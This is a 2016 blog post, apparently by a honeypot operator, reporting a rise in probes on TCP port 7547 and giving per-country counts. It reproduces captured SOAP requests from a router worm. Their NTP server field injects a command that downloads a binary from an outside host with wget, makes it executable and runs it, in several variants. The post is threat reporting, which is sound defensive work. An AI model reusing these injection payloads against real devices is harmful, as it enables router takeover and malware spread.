TCP/7547 on the rise

Posted on 2016-11-27, 08:05, by bjorn, under Uncategorized.

Since yesterday I’ve registered a significant increase in probes for TCP port 7547. Over the last 12 hours, more than 1000 different IP addresses have tried to contact one of my networks. 1000 probes is of course no big deal, but the port that’s suddenly become of interest can be.

The image below shows the newly discovered activity. Click the image to zoom. The probes for TCP/7547 starts to stand out just before 15:00 (Norwegian time zone).

TCP port 7547 has suddenly become interesting.

TCP port 7547 has suddenly become interesting.

The probing happens primarily from Brazilian IP addresses. Below is a table of top 10 registered probes after around 12 hours.

552 Brazil
186 United Kingdom
 50 Ireland
 42 Turkey
 34 Iran, Islamic Republic of
 30 Finland
 23 Italy
 21 Chile
 20 Thailand
 10 United States

Update: This looks like yet another router vulnerability. These are the headers captured by directing the traffic to one of my honeypots:

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> 
<SOAP-ENV:Body>
 <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
  <NewNTPServer1>`cd /tmp;wget hxxp://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
  <NewNTPServer2></NewNTPServer2>
  <NewNTPServer3></NewNTPServer3>
  <NewNTPServer4></NewNTPServer4>
  <NewNTPServer5></NewNTPServer5>
 </u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Based on the above, this looks like https://devicereversing.wordpress.com/ and https://www.exploit-db.com/exploits/40740/.

Update 2: Now the worm even cleans up after itself. The newest strain performs three requests; the first two downloads binaries while the third one sets the NTP server back to an IP address:

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
 <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
 <NewNTPServer1>`cd /tmp;wget hxxp://tr069.pw/1;chmod 777 1;./1`</NewNTPServer1>
 <NewNTPServer2/>
 <NewNTPServer3/>
 <NewNTPServer4/>
 <NewNTPServer5/>
 </u:SetNTPServers>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
 <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
 <NewNTPServer1>`cd /tmp;wget hxxp://tr069.pw/2;chmod 777 2;./2`</NewNTPServer1>
 <NewNTPServer2/>
 <NewNTPServer3/>
 <NewNTPServer4/>
 <NewNTPServer5/>
 </u:SetNTPServers>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
 <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
 <NewNTPServer1>24.56.178.140</NewNTPServer1>
 <NewNTPServer2/>
 <NewNTPServer3/>
 <NewNTPServer4/>
 <NewNTPServer5/>
 </u:SetNTPServers>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Tags: , , ,
«
»